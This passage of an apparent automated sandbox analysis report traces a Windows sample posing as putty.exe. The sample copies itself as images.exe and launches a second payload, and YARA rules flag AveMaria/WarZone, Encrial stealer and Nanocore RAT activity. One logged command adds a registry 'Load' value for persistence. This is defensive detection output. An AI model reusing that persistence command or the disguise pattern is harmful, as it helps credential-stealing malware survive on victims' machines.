                                Reputation:low

                                General

                                Start time:10:59:52
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                General

                                Start time:10:59:54
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: AveMaria_WarZone, Description: unknown, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                Reputation:low

                                General

                                Start time:10:59:56
                                Start date:02/08/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
                                Imagebase:0x49d30000
                                File size:302592 bytes
                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:10:59:56
                                Start date:02/08/2021
                                Path:C:\ProgramData\images.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\images.exe
                                Imagebase:0x1180000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 28%, ReversingLabs

                                General

                                Start time:10:59:57
                                Start date:02/08/2021
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
                                Imagebase:0xb50000
                                File size:62464 bytes
                                MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:00
                                Start date:02/08/2021
                                Path:C:\Windows\System32\verclsid.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                Imagebase:0xff8f0000
                                File size:11776 bytes
                                MD5 hash:3796AE13F680D9239210513EDA590E86
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:02
                                Start date:02/08/2021
                                Path:C:\ProgramData\images.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\images.exe
                                Imagebase:0x1180000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: AveMaria_WarZone, Description: unknown, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, Author: Joe Security

                                General

                                Start time:11:00:02
                                Start date:02/08/2021
                                Path:C:\Windows\System32\notepad.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
                                Imagebase:0xff1d0000
                                File size:193536 bytes
                                MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:04
                                Start date:02/08/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\cmd.exe
                                Imagebase:0x4ab20000
                                File size:302592 bytes
                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:16
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
                                Imagebase:0xf50000
                                File size:1378816 bytes
                                MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 20%, ReversingLabs

                                General

                                Start time:11:00:22
                                Start date:02/08/2021
                                Path:C:\Windows\System32\drvinst.exe
                                Wow64 process (32bit):false
                                Commandline:DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '000000000000059C' '0000000000000600'
                                Imagebase:0xff860000
                                File size:102912 bytes
                                MD5 hash:2DBA1472BDF847EAE358A4B9FA9AB0C1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:22
                                Start date:02/08/2021
                                Path:C:\Windows\System32\drivers\rdpdr.sys
                                Wow64 process (32bit):false
                                Commandline:
                                Imagebase:0xff380000
                                File size:165888 bytes
                                MD5 hash:1B6163C503398B23FF8B939C67747683
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:23
                                Start date:02/08/2021
                                Path:C:\Windows\system32\drivers\tdtcp.sys
                                Wow64 process (32bit):
                                Commandline:
                                Imagebase:
                                File size:23552 bytes
                                MD5 hash:51C5ECEB1CDEE2468A1748BE550CFBC8
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:24
                                Start date:02/08/2021
                                Path:C:\Windows\System32\DRIVERS\tssecsrv.sys
                                Wow64 process (32bit):
                                Commandline:
                                Imagebase:
                                File size:39936 bytes
                                MD5 hash:19BEDA57F3E0A06B8D5EB6D619BD5624
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:24
                                Start date:02/08/2021
                                Path:C:\Windows\System32\Drivers\RDPWD.SYS
                                Wow64 process (32bit):
                                Commandline:
                                Imagebase:
                                File size:212480 bytes
                                MD5 hash:FE571E088C2D83619D2D48D4E961BF41
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:37
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Imagebase:0xf50000
                                File size:1378816 bytes
                                MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:37
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Imagebase:0xf50000
                                File size:1378816 bytes
                                MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2355684386.0000000002502000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2360227304.0000000003777000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, Author: Joe Security

                                Disassembly

                                Code Analysis
